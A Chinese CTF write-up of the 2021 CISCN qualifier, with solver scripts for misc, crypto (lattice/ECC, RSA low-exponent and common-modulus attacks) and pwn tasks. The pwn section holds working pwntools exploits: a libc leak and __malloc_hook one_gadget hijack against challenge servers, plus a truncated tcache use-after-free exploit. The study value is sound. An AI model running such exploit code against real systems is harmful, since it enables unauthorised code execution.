2021-CISCN-First-Other

2021-CISCN-First-Other

五月 16, 2021 (Updated: )

Misc

tiny traffic

拿到流量包审计流量,发现两个可疑文件 test 和 secret;查看服务器响应信息(Content-Encoding 头)得知其使用 br(Brotli)算法压缩,写个脚本解压缩。

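import brotli

# The capture's server response advertised Brotli ("br") compression, so the
# extracted body must be *decompressed* here.  The original listing called
# brotli.compress, which would double-compress `secret` and leave nothing for
# the protobuf parser in the next step.
with open('secret', 'rb') as f:
    content = brotli.decompress(f.read())
with open('secret123', 'wb') as o:
    o.write(content)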

test 解压缩后得到 proto3 协议的自定义规则(.proto 定义);用 protoc 编译成 flag_pb2.py 后,python 写个脚本用该规则读取 secret 中解压缩出的数据即得 flag,转一下格式即可。

import flag_pb2 as flag

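def read_test():
    """Parse the Brotli-decompressed capture body as a PBResponse and print it.

    Reads ./secret123 (the decompressed `secret` payload written by the
    previous script) and decodes it with the message class generated from the
    recovered .proto definition (flag_pb2).
    """
    flag_msg = flag.PBResponse()
    flag_msg_file = "./secret123"

    # Context manager: the handle is closed even if ParseFromString raises
    # (the original left it open on error).
    with open(flag_msg_file, "rb") as f:
        flag_msg.ParseFromString(f.read())

    print(flag_msg)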

running_pixel

gif文件分割后查看图片像素可以在RGB的低3位色道中看到一个突兀的小点,提取像素发现该值为(233,233,233),且很多图片都有。
很明显该像素点的运动轨迹即为flag。运动轨迹提取脚本如下:

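import os
from PIL import Image

# Frames split out of running_pixel.gif live in this directory.  They must be
# walked in playback order for the marker's trajectory to make sense, and
# os.listdir() gives no ordering guarantee -- so sort the names.  (Lexical
# order; if the splitter numbers frames without zero-padding, sort on the
# numeric part instead.)
frame_dir = './running_pixel.gif.ifl'
files = sorted(os.listdir(frame_dir))

MARKER = (233, 233, 233)   # the out-of-place pixel value found in the frames
SIZE = 400                 # frame width/height assumed by the original script
WHITE = (255, 255, 255)

img = Image.new('RGB', (SIZE, SIZE), 0)

num = 0
for file in files:
    tmp = Image.open(os.path.join(frame_dir, file))
    found = False
    for i in range(SIZE):
        for j in range(SIZE):
            if tmp.getpixel((j, i)) == MARKER:
                # NOTE(review): the original samples at (j, i) but plots at
                # (i, j), i.e. the trace comes out transposed.  Kept as-is,
                # since that is what produced the readable flag.
                img.putpixel((i, j), WHITE)
                found = True
                break
        if found:
            break
    if not found:
        # A frame with no marker ends one glyph: dump the accumulated trace and
        # start from a black canvas again (the original cleared pixel by pixel).
        num += 1
        img.save('flag' + str(num).zfill(2) + '.png')
        img = Image.new('RGB', (SIZE, SIZE), 0)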

隔空喊话

题目所给数据为PDU编码数据,工具解码即可看到关键提示。

查阅 PDU 编码格式资料发现第五行之后的数据时间顺序紊乱,脚本按时间戳排序后再次解码可以得到宽高错误的 png 文件;提示 w465,将宽度修改为 465(即修改 PNG IHDR 中的宽度字段),高任意,然后打开即可看到 flag。

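# 时间戳排序脚本 -- sort the PDU lines by their timestamp field
import binascii


def pdu_time_key(line):
    """Return the sort key the original bubble sort used for one PDU hex line.

    Characters 42..45 hold two octets of the (presumably SMSC) timestamp in
    PDU semi-octet encoding -- each pair is nibble-swapped -- so each pair is
    reversed before being read as a two-digit decimal.  They are combined as
    first*60 + second, i.e. treated as a (minutes, seconds)-style pair.
    NOTE(review): offset 42 is specific to this capture's PDU layout; confirm
    before reusing on other data.
    """
    first = line[42:44][::-1]
    second = line[44:46][::-1]
    return int(first) * 60 + int(second)


with open('data.txt', 'r') as f:
    with open('data123.txt', 'w') as o:
        lines = [line.strip() for line in f.readlines()]
        # sorted() is stable and the original bubble sort only swapped on a
        # strictly-greater key, so equal timestamps keep their input order in
        # both -- same output, without the O(n^2) passes.
        for entry in sorted(lines, key=pdu_time_key):
            o.write(entry + '\n')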
# 解码后hex数据转文件 -- turn the decoded hex dump back into a binary file
import binascii

with open('data.back.txt', 'r') as src, open('data_hex', 'wb') as dst:
    # one hex-encoded record per line; drop the newline before decoding
    for record in src:
        dst.write(binascii.a2b_hex(record.strip()))

robot

查看流量包可以发现流量包中存在明文坐标数据。脚本提取坐标画图直接出。

45
with open('cap.pcapng', 'rb') as f:
    with open('data.txt', 'wb') as o:
        # Skip the fixed-size preamble (presumably section header + interface
        # description), then step through the capture block by block.
        f.read(0x120)
        tmp = f.read(0x1c)            # 28 bytes preceding each length word
        while tmp != b'':
            # little-endian 32-bit length word
            length = int.from_bytes(f.read(4), 'little')
            # block bodies are padded to a 4-byte boundary
            padded = length + (-length % 4)
            if 135 <= length <= 140:
                # Only records in this size band carry the coordinate
                # messages; store each with a one-byte (padded) length prefix.
                o.write(bytes.fromhex(hex(padded)[2:]))
                o.write(f.read(padded))
            else:
                f.read(padded)
            tmp = f.read(0x1c)


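with open('data.txt', 'rb') as f:
    with open('address.txt', 'w') as o:
        # Each record is a one-byte length followed by that many bytes -- the
        # layout written by the capture-extraction step above.
        length = f.read(1)
        while length != b'':
            data = f.read(length[0])
            # Locate the "[x, y]" list that follows the "Value\0" tag.  A record
            # without the tag (or without a closing bracket) is skipped instead
            # of aborting the whole extraction with ValueError, as the original
            # would have.
            l_index = data.find(b'Value\x00[')
            if l_index != -1:
                l_index = data.index(b'[', l_index)
                r_index = data.find(b']', l_index)
                if r_index != -1:
                    coord = data[l_index:r_index + 1].decode() + '\n'
                    # Records containing '-' (presumably negative coordinates)
                    # are dropped, exactly as the original did.
                    if '-' not in coord:
                        o.write(coord)
            length = f.read(1)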

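import ast
from PIL import Image

# 400x200 canvas, presumably sized to the coordinate range in the capture
# (putpixel raises if a point falls outside it).
img = Image.new('L', (400, 200))
with open('address.txt', 'r') as f:
    for line in f.readlines():
        # Each line is a "[x, y]" literal pulled straight out of packet
        # payloads, i.e. data an attacker controls.  ast.literal_eval accepts
        # only Python literals; the original's eval() would have executed any
        # code embedded in the capture.
        point = ast.literal_eval(line.strip())
        img.putpixel((point[0], point[1]), 255)

img.show()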

Crypto

Move

和2021虎符的题挺像。
先造格子LLL,规约出x和y;再用二分法算出p+q;再解方程求出p和q;剩下就是ECC

# SageMath script (run under `sage`): `^` is exponentiation and matrix, var,
# solve, EllipticCurve, GF and inverse_mod are Sage builtins.
# Challenge parameters: modulus n, an unusually large exponent e, two small
# hints h1/h2 (not used by the script) and the ciphertext point c.
n = 80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421106848023637323702085026892674032294882180449860010755423988302942811352582243198025232225481839705626921264432951916313817802968185697281
e = 67595664083683668964629173652731210158790440033379175857028564313854014366016864587830963691802591775486321717360190604997584315420339351524880699113147436604350832401671422613906522464334532396034178284918058690365507263856479304019153987101884697932619200538492228093521576834081916538860988787322736613809
h1 = 3518005
h2 = 641975
c = (6785035174838834841914183175930647480879288136014127270387869708755060512201304812721289604897359441373759673837533885681257952731178067761309151636485456082277426056629351492198510336245951408977207910307892423796711701271285060489337800033465030600312615976587155922834617686938658973507383512257481837605,38233052047321946362283579951524857528047793820071079629483638995357740390030253046483152584725740787856777849310333417930989050087087487329435299064039690255526263003473139694460808679743076963542716855777569123353687450350073011620347635639646034793626760244748027610309830233139635078417444771674354527028)

# 2x2 lattice whose shortest vector encodes the relation e*x - y*n = k used
# below (see `k = e * x - y * n`); hn = floor(sqrt(n)) scales the first column
# so that x and y come out balanced.
hn = int(sqrt(n))
M = matrix([[hn, e],
            [0, -n]])
L = M.LLL()[0]
# print (L)
# (-235436912945336662391026124471105219395770217328162018931594609419582745114251948238840212881814533708592325776478635076056630520429862826686225762483017735282225173655229129488512828712599656980161312082481987496707036067942329100, -406850608655407486298019095013146348847805975120061760929682791882948049742096195978800022454159691659865169100330308708576847735609146508679126419372034710027124703842712262177437006326228856546452636094881051757653949488135598409)
mm = matrix(L)
# print ((-mm)/M)
# x, y are the coefficients printed by the line above, pasted back in.
x, y = 26279444166664821795077701675621823220865336004430428203703688888211697122228, 22131877391133483964429946329193825460775374851078084751208971056041193500203
# NOTE(review): `bound` is computed but never used in the rest of the script.
bound = int(sqrt(2 * n)) // 12

def find_p_puls_q(K, N):
    """Binary-search an approximation of p + q from the LLL-derived K.

    Sage semantics: `^` is exponentiation, so `s ^ 2` is s squared and
    `N ^ 0.25` is a real fourth root of N.  The search moves `l` up while the
    test value `v` stays below 4*N and moves `r` down otherwise, returning `r`
    after 515 halvings (enough to pin a ~512-bit value).

    NOTE(review): `round(N ^ 0.25)` presumably goes through Sage's default
    53-bit RealField, so the divisor is only an approximation of sqrt(N).  It
    was evidently good enough for the search to converge on this instance; the
    `s` it produced is recorded in the comment after the call.
    """
    l = 0
    r = K
    for i in range(515):
        s = (l + r) // 2
        # monotone-in-s test derived from the challenge's relation (see writeup)
        v = s * s - int(9 * s ^ 2 * (K - 1 - s) * (K - 1 - s)) // (round(N ^ 0.25) * round(N ^ 0.25))
        if v < 4 * N:
            l = s
        else:
            r = s
    return r

# k from the lattice relation; K = k // y feeds the p+q search.
k = e * x - y * n
K = k // y
s = find_p_puls_q(K, n)
# print(s)
# s=18383013852155207284866834850624501649134164688503883162216824258842790032992437383933186349369945088653252318167911285710266631681220716855493349532603970
# With p + q and p * q known, p and q are the roots of t^2 - s*t + n
# (solve() prints them; the values are pasted below).
var('p q')
eq1 = p + q == s
eq2 = p * q == n
solve([eq1, eq2], p, q)
p = 7137110102022535123348664656689848983548191256934755709215236325084864398993149288243244941561397379979025441681860286823605147363784020425000696750337273
q = 11245903750132672161518170193934652665585973431569127453001587933757925633999288095689941407808547708674226876486050998886661484317436696430492652782266697
# Curve y^2 = x^3 + b (a = 0); b is recovered from the ciphertext point
# itself, which must lie on the curve.  Note x, y are rebound here to the
# point's coordinates (no longer the lattice coefficients).
a = 0
x, y = 6785035174838834841914183175930647480879288136014127270387869708755060512201304812721289604897359441373759673837533885681257952731178067761309151636485456082277426056629351492198510336245951408977207910307892423796711701271285060489337800033465030600312615976587155922834617686938658973507383512257481837605, 38233052047321946362283579951524857528047793820071079629483638995357740390030253046483152584725740787856777849310333417930989050087087487329435299064039690255526263003473139694460808679743076963542716855777569123353687450350073011620347635639646034793626760244748027610309830233139635078417444771674354527028
# y^2==(x^3+b)%n
b = (y ^ 2 - x ^ 3) % n
# b=80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421103469394495274706241578726021598690355239783781433785479293793926265140251884444575671410967573946453503486277025286699273827984004452338
# RSA-on-a-curve decryption: the group order used for the private exponent is
# (p+1)(q+1) (as the original wrote it), and d * C recovers the message point.
# The curve is built over GF(p) only; the printed G is read off mod p.
phi = (p + 1) * (q + 1)
d = inverse_mod(e, phi)
E = EllipticCurve(GF(p), [a, b])
C = E([x, y])
G = d * C
print(G)

# The two coordinates of G, pasted in and turned back into the flag bytes.
from Crypto.Util.number import *
print(long_to_bytes(1500537458076802315061673741609048809282155574)+long_to_bytes(293348288331056197202496342835702240774641366909))

Imageencrypt

用testimage爆破key,排列组合试一下推出ch,然后求seq,再求x,求r,再求x0

# -*- coding: utf-8 -*-
from collections import Counter
import itertools
import md5

# Known plaintext: 256 pixel bytes of the test image ...
testimage=[205, 237, 6, 158, 24, 119, 213, 32, 74, 151, 142, 186, 57, 28, 113, 62, 165, 20, 190, 37, 159, 137, 196, 44, 97, 37, 7, 222, 220, 95, 4, 66, 0, 28, 199, 142, 95, 105, 119, 232, 250, 215, 60, 162, 91, 211, 63, 30, 91, 108, 217, 206, 80, 193, 230, 42, 221, 71, 136, 115, 22, 176, 91, 57, 61, 3, 87, 73, 250, 121, 51, 72, 83, 120, 77, 199, 236, 190, 249, 116, 45, 6, 134, 110, 149, 94, 214, 232, 153, 213, 119, 98, 81, 203, 240, 114, 240, 29, 122, 188, 156, 53, 128, 185, 40, 147, 245, 204, 47, 101, 80, 229, 41, 150, 28, 195, 25, 235, 119, 6, 192, 8, 73, 255, 159, 172, 77, 94, 254, 104, 236, 219, 141, 91, 195, 162, 97, 56, 252, 173, 163, 43, 167, 214, 50, 73, 115, 190, 254, 53, 61, 77, 138, 192, 15, 4, 190, 27, 37, 108, 101, 135, 90, 215, 106, 243, 112, 111, 106, 89, 143, 150, 185, 142, 192, 176, 48, 138, 164, 185, 61, 77, 72, 0, 17, 203, 210, 71, 186, 49, 162, 250, 218, 219, 195, 63, 248, 220, 155, 180, 219, 132, 219, 94, 144, 247, 211, 95, 70, 227, 222, 31, 69, 24, 13, 216, 185, 108, 137, 57, 186, 211, 55, 27, 158, 241, 223, 21, 134, 106, 152, 127, 187, 245, 246, 131, 176, 177, 228, 100, 112, 11, 84, 61, 193, 42, 41, 69, 229, 145, 254, 138, 3, 153, 123, 31]
# ... and the same 256 bytes after the challenge's encryption (known-plaintext pair).
enc_testimag=[131, 92, 72, 47, 177, 57, 131, 118, 4, 38, 192, 19, 119, 82, 63, 143, 235, 165, 15, 140, 209, 223, 117, 133, 47, 148, 81, 144, 138, 246, 173, 235, 177, 181, 110, 39, 9, 192, 57, 166, 180, 153, 141, 19, 234, 157, 142, 80, 234, 197, 151, 152, 249, 143, 176, 155, 147, 17, 57, 194, 191, 254, 13, 144, 140, 85, 25, 248, 172, 208, 154, 249, 5, 201, 27, 137, 69, 23, 175, 34, 156, 72, 208, 32, 195, 16, 127, 65, 207, 131, 57, 203, 7, 98, 89, 36, 65, 75, 211, 21, 45, 132, 214, 239, 102, 58, 68, 130, 97, 204, 225, 76, 152, 216, 74, 149, 79, 165, 198, 72, 150, 94, 7, 177, 46, 226, 252, 247, 79, 62, 69, 106, 60, 21, 106, 236, 47, 145, 170, 28, 18, 101, 14, 152, 131, 7, 37, 15, 168, 99, 115, 27, 220, 150, 89, 82, 232, 170, 107, 221, 212, 46, 235, 129, 36, 66, 217, 222, 36, 15, 217, 192, 247, 192, 113, 230, 129, 196, 13, 247, 148, 228, 225, 86, 71, 133, 132, 238, 236, 127, 11, 83, 107, 141, 114, 150, 182, 146, 213, 250, 141, 53, 114, 16, 198, 70, 133, 17, 247, 173, 136, 73, 236, 78, 188, 150, 239, 58, 199, 136, 11, 122, 134, 77, 47, 167, 137, 188, 55, 195, 41, 49, 245, 92, 160, 213, 254, 0, 85, 205, 193, 69, 2, 140, 143, 155, 127, 236, 179, 199, 168, 35, 85, 40, 45, 174]
# The encrypted flag image (384 bytes) that the recovered keystream decrypts.
enc_flagimag=[198, 143, 247, 3, 152, 139, 131, 84, 181, 180, 252, 177, 192, 25, 217, 179, 136, 107, 190, 62, 4, 6, 90, 53, 105, 238, 117, 44, 5, 116, 132, 195, 214, 171, 113, 209, 18, 31, 194, 174, 228, 212, 196, 14, 27, 41, 211, 56, 139, 135, 225, 214, 89, 122, 178, 212, 185, 231, 204, 150, 204, 212, 160, 142, 213, 173, 186, 166, 65, 238, 5, 32, 45, 31, 25, 189, 148, 38, 78, 79, 33, 56, 227, 48, 103, 163, 31, 189, 37, 124, 106, 249, 86, 188, 86, 233, 41, 250, 89, 7, 212, 234, 111, 104, 245, 102, 227, 96, 160, 67, 181, 13, 26, 192, 214, 210, 188, 84, 216, 215, 243, 72, 233, 2, 122, 166, 107, 251, 70, 128, 94, 190, 185, 210, 34, 85, 77, 29, 182, 77, 115, 208, 228, 252, 73, 198, 151, 70, 10, 97, 138, 235, 21, 117, 239, 102, 129, 2, 253, 80, 53, 61, 184, 220, 41, 82, 37, 140, 23, 143, 179, 53, 153, 113, 213, 211, 111, 197, 248, 65, 60, 69, 1, 81, 48, 254, 251, 89, 195, 8, 93, 190, 66, 174, 97, 175, 210, 191, 66, 112, 123, 128, 33, 230, 237, 104, 16, 192, 239, 173, 44, 10, 120, 231, 114, 151, 140, 63, 103, 44, 243, 222, 242, 73, 51, 46, 98, 137, 163, 152, 147, 95, 223, 3, 15, 112, 85, 215, 133, 131, 240, 239, 224, 195, 140, 124, 70, 156, 221, 241, 37, 245, 1, 99, 9, 157, 99, 150, 47, 118, 225, 16, 13, 141, 135, 99, 18, 119, 63, 160, 6, 247, 27, 68, 45, 199, 86, 193, 252, 21, 135, 32, 42, 103, 114, 241, 49, 249, 182, 52, 18, 155, 157, 61, 4, 246, 158, 52, 118, 242, 195, 54, 139, 232, 100, 31, 11, 233, 58, 100, 101, 137, 83, 145, 209, 7, 241, 96, 57, 148, 207, 29, 237, 124, 177, 166, 161, 20, 116, 122, 61, 71, 46, 82, 18, 157, 253, 130, 112, 66, 94, 57, 221, 243, 222, 192, 147, 5, 130, 201, 174, 26, 160, 16, 188, 103, 187, 11, 238, 182, 144, 4, 137, 33, 84, 100, 7, 239, 219, 83, 112, 189, 166, 58, 93, 141, 30, 198, 220, 196, 118, 172, 5, 45]

def generate(x, r):
    """One step of the writeup's logistic-style map, x' = r*x*(3-x), rounded to 6 places.

    The product is evaluated as (r*x)*(3-x), exactly as the original wrote
    it, so the float result -- and therefore the rounding -- is unchanged.
    """
    scaled = r * x
    return round(scaled * (3 - x), 6)

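# Key recovery from the known-plaintext test image.  Every ciphertext byte is
# plaintext XOR one of four masks (key1, ~key1, key2, ~key2), so the XOR of
# plaintext and ciphertext takes only four values; the most common ones are
# the candidates (c.most_common(4) is where 86/169 and 78/177 came from).
keys = [testimage[i] ^ enc_testimag[i] for i in range(256)]
c = Counter(keys)
#print(c.most_common(4))
for key1, key2 in itertools.product([86, 169], [78, 177]):
    # ch in {0,1,2,3} names the mask used for each byte; -1 = no match
    chs = []
    for i in range(256):
        mask = enc_testimag[i] ^ testimage[i]
        ch = -1
        if mask == key1:
            ch = 0
        if mask == (~key1) & 0xff:
            ch = 1
        if mask == key2:
            ch = 2
        if mask == (~key2) & 0xff:
            ch = 3
        chs.append(ch)
    # two bits per byte, read 16 at a time -> the 16-bit keystream samples
    binch = ''.join([bin(ch)[2:].rjust(2, '0') for ch in chs])
    seqs = [int(binch[i:i + 16], 2) for i in range(0, len(binch), 16)]
    # Estimate r from consecutive samples of x' = r*x*(3-x) with x = seq/22000.
    # 22000.0 forces true division under Python 2 as well (the script's final
    # `print md5...` is Python 2 syntax); `seq / 22000` there truncates to
    # 0..2 and makes every estimate meaningless.
    rs = []
    for i in range(1, len(seqs)):
        x2 = seqs[i] / 22000.0
        x1 = seqs[i - 1] / 22000.0
        try:
            r = x2 / (x1 * (3 - x1))
        except ZeroDivisionError:
            # x1 == 0 or x1 == 3 carries no information: skip it rather than
            # re-append a stale r (or hit NameError on the very first pair,
            # which the original's bare `except: pass` would have caused).
            continue
        rs.append(r)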

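# Fix the mask assignment and r picked from the candidate loop above, then
# brute-force the map's starting value near the first sample so that
# iterating generate() reproduces every 16-bit sample exactly.
key1 = 169
key2 = 78
r = 1.2
seqs = [47909, 47275, 48284, 46656, 49226, 45038, 51495, 40740, 56131, 30213, 58976, 22593, 53493, 36492, 58734, 23276,
54242, 34786, 59225, 21883, 52659, 38317, 57857, 25696, 56490, 29302, 58654, 23501, 54478, 34236, 59316, 21623]
# 22000.0: true division on Python 2 too (the script ends with a Python 2
# print statement); integer division would put the window near 2.0 and never
# match a sample.
tmp = [round(seq / 22000.0, 6) for seq in seqs]

v = round(tmp[0], 6)
# NOTE(review): the window is [v - 0.001, v) in 1e-6 steps -- it never tests
# v itself or anything above it.  The x used later (2.177698) lies above
# tmp[0], so it was presumably found with a different window.
for i in range(1000):
    tmpv = v - 1000 * 0.000001 + i * 0.000001
    f = True
    for j in range(0, len(seqs)):
        # the original wrapped this comparison in int(); a plain bool is identical
        if seqs[j] != int(tmpv * 22000):
            f = False
        tmpv = generate(tmpv, r)
    if f:
        print(v - 1000 * 0.000001 + i * 0.000001)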

# Regenerate the keystream from the fitted map: step x across the 32 known
# samples, then emit 16 more to cover all 24*16 = 384 flag-image bytes.
x = 2.177698
x0 = 0.840264   # unused below; presumably the map's true seed, kept from the original
for i in range(len(seqs) - 1):
    x = generate(x, r)
for i in range(16):
    x = generate(x, r)
    seqs.append(int(x * 22000))

# 16-bit samples -> one bit string; each byte's mask is chosen by two bits
bins = ''.join(bin(seq)[2:].zfill(16) for seq in seqs)


def _unmask(ch, pix):
    # inverse of the per-byte transform (XOR undoes XOR, ~ undoes ~)
    if ch == 0:
        return (pix ^ key1) & 0xff
    if ch == 1:
        return (~pix ^ key1) & 0xff
    if ch == 2:
        return (pix ^ key2) & 0xff
    return (~pix ^ key2) & 0xff


plain = []
for index in range(24 * 16):
    ch = int(bins[2 * index:2 * index + 2], 2)
    plain.append(_unmask(ch, enc_flagimag[index]))

# Python 2: the answer is the MD5 of the decrypted image bytes
data = ''.join(map(chr, plain))
print md5.new(data).hexdigest()

Rsa

msg1:e=3,RSA的低加密指数攻击

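import gmpy2
from Crypto.Util.number import *

# msg1: e = 3 with a message small enough that m^3 barely wraps past n, so m
# is the exact integer cube root of c + i*n for some small i (low-exponent
# attack).  Unbounded search, as in the original: it only terminates if such
# an i exists.
c = 19105765285510667553313898813498220212421177527647187802549913914263968945493144633390670605116251064550364704789358830072133349108808799075021540479815182657667763617178044110939458834654922540704196330451979349353031578518479199454480458137984734402248011464467312753683234543319955893
e = 3
# plain int literal: the original's trailing `L` is Python 2-only syntax
n = 123814470394550598363280518848914546938137731026777975885846733672494493975703069760053867471836249473290828799962586855892685902902050630018312939010564945676699712246249820341712155938398068732866646422826619477180434858148938235662092482058999079105450136181685141895955574548671667320167741641072330259009
i = 0
while 1:
    # one iroot per candidate (the original computed the same root twice)
    root, exact = gmpy2.iroot(c + i * n, 3)
    if exact:
        ans = root
        break
    i = i + 1
#print(long_to_bytes(ans))
msg1 = long_to_bytes(ans)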

# msg2: 共模攻击 (common-modulus attack: same n, coprime e1/e2)
from libnum import n2s,s2n
import gmpy2
def egcd(a, b):
    """Extended Euclid: return (g, x, y) with g = gcd(a, b) and a*x + b*y == g.

    Iterative form of the usual recursion.  It walks the same remainder
    sequence, so it yields the same Bezout coefficients as the recursive
    version (e.g. egcd(17, 65537) == (1, 30841, -8)); egcd(0, b) is (b, 0, 1).
    """
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
        old_t, t = t, old_t - q * t
    return (old_r, old_s, old_t)
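# Two encryptions of the same m under the same n with coprime exponents:
# from a*e1 + b*e2 == 1 we get m = c1^a * c2^b mod n.  A negative coefficient
# is applied to the modular inverse of that ciphertext instead.
c1=54995751387258798791895413216172284653407054079765769704170763023830130981480272943338445245689293729308200574217959018462512790523622252479258419498858307898118907076773470253533344877959508766285730509067829684427375759345623701605997067135659404296663877453758701010726561824951602615501078818914410959610
# plain int literal: the original's trailing `L` is Python 2-only syntax
n=111381961169589927896512557754289420474877632607334685306667977794938824018345795836303161492076539375959731633270626091498843936401996648820451019811592594528673182109109991384472979198906744569181673282663323892346854520052840694924830064546269187849702880332522636682366270177489467478933966884097824069977
e1=17
c2=91290935267458356541959327381220067466104890455391103989639822855753797805354139741959957951983943146108552762756444475545250343766798220348240377590112854890482375744876016191773471853704014735936608436210153669829454288199838827646402742554134017280213707222338496271289894681312606239512924842845268366950
e2=65537
g, s1, s2 = egcd(e1, e2)
if g != 1:
    # the attack only works for coprime exponents; fail loudly instead of
    # producing a meaningless m
    raise ValueError('e1 and e2 must be coprime for the common-modulus attack')
if s1 < 0:
    s1 = -s1
    c1 = gmpy2.invert(c1, n)
elif s2 < 0:
    s2 = -s2
    c2 = gmpy2.invert(c2, n)
m = pow(c1, s1, n) * pow(c2, s2, n) % n
#print n2s(m)
msg2 = long_to_bytes(m)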

# msg3: 高位攻击恢复 p (recover p from its known high bits, then decrypt normally)
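from Crypto.Util.number import *
import gmpy2
c3 = 59213696442373765895948702611659756779813897653022080905635545636905434038306468935283962686059037461940227618715695875589055593696352594630107082714757036815875497138523738695066811985036315624927897081153190329636864005133757096991035607918106529151451834369442313673849563635248465014289409374291381429646
e3 = 65537
# n3 was broken over two lines in the listing (a SyntaxError); joined here and
# without the Python 2-only `L` suffix.
n3 = 113432930155033263769270712825121761080813952100666693606866355917116416984149165507231925180593860836255402950358327422447359200689537217528547623691586008952619063846801829802637448874451228957635707553980210685985215887107300416969549087293746310593988908287181025770739538992559714587375763131132963783147

#sage求p -- p was recovered separately in Sage (the high-bits step, presumably
# Coppersmith's method; not reproduced here).  p3 and m3 below are pasted results.

p3 = 11437038763581010263116493983733546014403343859218003707512796706928880848035239990740428334091106443982769386517753703890002478698418549777553268906496423
m3 = 978430871477569051989776547659020359721056838635797362474311886436116962354292851181720060000979143571198378856012391742078510586927376783797757539078239088349758644144812898155106623543650953940606543822567423130350207207895380499638001151443841997176299548692737056724423631882

if n3 % p3 != 0:
    # a wrong pasted factor would silently corrupt phi3 and d below
    raise ValueError('p3 does not divide n3: the recovered factor is wrong')
q3 = n3 // p3          # `//`: `/` yields a float on Python 3 and breaks phi3
phi3 = (p3 - 1) * (q3 - 1)
d = gmpy2.invert(e3, phi3)
msg3 = pow(c3, d, n3)
#print(long_to_bytes(msg3))
# NOTE(review): as in the original, the freshly computed decryption is then
# replaced by the pasted m3.
msg3 = long_to_bytes(m3)

import hashlib
text = msg1 + msg2 + msg3
print(text)
# hashlib replaces the Python 2-only `md5` module so this tail also runs on 3
print(hashlib.md5(text).hexdigest())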

Pwn

pwny

from pwn import*
import sys
context.arch = 'amd64'
libc = ELF('./libc-2.27.so')
elf = ELF('./pwny')
# NOTE(review): this connection is opened at import time and then replaced by
# the one made in __main__ (a different host/port), so it looks like a
# leftover from an earlier run; it will also abort the script before main if
# that host is unreachable.
r = remote('124.70.2.166', 23040)

def all_in(idx, cont='', flag=0):
    """Menu option 2 (presumably the write action): pick `idx`, then optionally send `cont`.

    The index goes out as text.  With flag == 1, `cont` is sent raw via
    send() -- no trailing newline -- so a packed 8-byte value arrives intact.
    """
    r.sendlineafter('choice: ', '2')
    r.sendlineafter('Index: ', str(idx))
    if flag != 1:
        return
    r.send(str(cont))

def read(flag=0, idx=0):
    """Menu option 1 (read): with flag == 1, send `idx` as a raw packed 8-byte value.

    Packing the index is how the negative (out-of-bounds) slots such as
    0xfffffffffffffff0 are reached.  Without the flag the helper only answers
    the index prompt with "3" and logs a note; it does not select a menu
    option first.
    """
    if flag != 1:
        r.sendlineafter('Index: ', str(3))
        info("FD is not 0!!!")
        return
    r.sendlineafter('choice: ', '1')
    r.sendlineafter('Index: ', p64(idx))

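def pwn():
    """Leak libc and the binary base through the OOB read, then hijack __malloc_hook.

    Raises RuntimeError when the libc leak is unusable (the original merely
    closed the socket and carried on with a bogus address).  Also fixes the
    original's reference to an undefined name `onegad` -- a NameError that the
    caller's bare `except` would have swallowed, retrying forever.
    """
    all_in(256)
    # gdb.attach(r)
    # gdb.attach(r, 'set *0x555555756860=0')
    # slot -16 (0xff..f0 as a signed index) holds a pointer __libc_start_main-relative
    read(1, 0xfffffffffffffff0)
    r.recvuntil('Result: ')
    libc_addr = int(r.recvuntil('\n', drop=1), 16) - libc.sym['__libc_start_main']
    if libc_addr < 0:
        r.close()
        raise RuntimeError('libc leak failed (negative base)')
    malloc_hook = libc_addr + libc.sym['__malloc_hook']
    # one_gadget offsets for this libc-2.27; index 1 is the one the original selects
    onegad = [0x4f3d5, 0x4f432, 0x10a41c]
    onegadget = libc_addr + onegad[1]
    realloc = libc_addr + libc.sym['realloc']
    realloc_hook = libc_addr + libc.sym['__realloc_hook']
    # slot -11 holds a pointer into the binary: recover its base and the array
    read(1, 0xfffffffffffffff5)
    r.recvuntil('Result: ')
    text_addr = int(r.recvuntil('\n', drop=1), 16) - 0x202008
    array_addr = text_addr + 0x202060
    success("text_addr: 0x%x"%(text_addr))
    # Put the gadget in __realloc_hook and point __malloc_hook at realloc+2,
    # a common trick to enter the gadget with a stack layout that satisfies
    # its constraints.  Offsets are in 8-byte slots relative to the array;
    # `//` keeps them ints on Python 3 (identical to `/` on Python 2).
    off = (realloc_hook - array_addr) // 8
    all_in(off, p64(onegadget), 1)

    off = (malloc_hook - array_addr) // 8
    all_in(off, p64(realloc + 2), 1)

    # oversized input, presumably to force a malloc so the hook fires
    r.sendline('1'*0x500)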

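if __name__ == '__main__':
    # The leak / gadget constraints do not hold on every run, so reconnect
    # and retry until an interactive session is reached.  Once the user
    # leaves that session the loop ends (the original reconnected forever),
    # and Ctrl-C is no longer swallowed: only Exception subclasses trigger a
    # retry.
    while 1:
        try:
            r = remote('123.60.211.115', 23074)
            pwn()
            r.interactive()
            break
        except Exception:
            r.close()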

lonelywolf

from pwn import*
import sys
context.arch = 'amd64'
def add(size):
    """Menu 1: allocate a chunk of `size` bytes in the single slot (index 0)."""
    answers = (('choice: ', '1'), ('Index: ', '0'), ('Size: ', str(size)))
    for prompt, answer in answers:
        r.sendlineafter(prompt, answer)

def edit(cont):
    """Menu 2: overwrite slot 0 with `cont` (sent as text, newline-terminated)."""
    answers = (('choice: ', '2'), ('Index: ', '0'), ('Content: ', str(cont)))
    for prompt, answer in answers:
        r.sendlineafter(prompt, answer)

def delete():
    """Menu 4: free slot 0 (the slot stays usable afterwards -- the UAF)."""
    for prompt, answer in (('choice: ', '4'), ('Index: ', '0')):
        r.sendlineafter(prompt, answer)

def show():
    """Menu 3: print slot 0's content (caller parses the reply)."""
    for prompt, answer in (('choice: ', '3'), ('Index: ', '0')):
        r.sendlineafter(prompt, answer)

def confirm(name, addr):
    """Log `addr` in hex under the label `name` through pwntools' success logger."""
    label = 'The ' + str(name) + ' Addr=====> '
    log.success(label + str(hex(addr)))


# main_arena offset in the target libc-2.27, used below to turn the leaked
# libc pointer into the libc base.  NOTE(review): pasted constant -- confirm
# against the libc actually shipped if the challenge is re-run.
main_arena = 0x3ebc40
elf=ELF('./lonelywolf')
libc=ELF('./libc-2.27.so')


def pwn():
    """Exploit lonelywolf through the use-after-free (edit/show still work after delete).

    Outline -- the statement order below must be kept exactly:
      1. free a chunk and read its tcache `next` field back -> heap base;
      2. forge a tcache entry (next + key) so an allocation lands on the
